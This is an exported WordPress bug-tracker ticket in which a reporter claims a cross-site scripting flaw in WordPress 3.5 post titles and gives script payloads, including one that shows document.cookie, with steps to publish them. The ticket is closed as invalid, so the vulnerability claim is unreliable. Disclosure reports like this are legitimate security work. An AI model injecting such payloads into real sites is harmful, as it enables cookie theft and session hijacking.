id	summary	reporter	owner	description	type	status	priority	milestone	component	version	severity	resolution	keywords	cc
22861	Wordpress 3.5 - Cross Site Scripting Vulnerability	shubhammittal01		"Hi, my name is Shubham Mittal. I have found a bug in the new WordPress (latest version, 3.5). This bug is cross-site scripting.

[XSS] New Wp-Post

Exploit Title: CMS Wordpress - XSS Vulnerability [[BR]]
Author : Shubham Mittal[[BR]]
E-mail : upgoingstaar@gmail.com [[BR]]
Webpage: http://3ncrypt0r.blogspot.com[[BR]]
Version CMS : Version 3.5 (Last Version) [[BR]]
Category : WebApps / Content Management System (CMS) [[BR]]
Security Risk: Medium Level [[BR]]
Link Download: http://www.wordpress.org/ [[BR]]
Tested On : Mozilla Firefox + WAMP + Windows 7 64 Bit

[Information Content]
WordPress - Web Publishing Software. http://www.wordpress.org/

[Vulnerability Details]

XSS CODE: 
<script>alert(""XSSedByShubham"")>[[BR]]
</script<script>alert(document.cookie);</script>[[BR]]
<script>window.open(""http://www.google.com/"")</script>

Exploit Report:
1. Create / Edit Wp-Post
Input ""Title Post"" with script XSS Code.
<script>alert(""XSSedByShubham"")</script>

2. http://example.com/wp-admin/post-new.php <---Publish It
 
3. View XSS, Alert Box will pop up. http://example.com/?p=xxx <--XSSed
http://4.bp.blogspot.com/-zNKPa-mQPEc/UMejBt8a3HI/AAAAAAAABQQ/HsG9RQnRwlg/s1600/post+xss.jpg

Thanks

Shubham Mittal
@upgoingstar"	defect (bug)	closed	normal		Security		normal	invalid		upgoingstaar@…
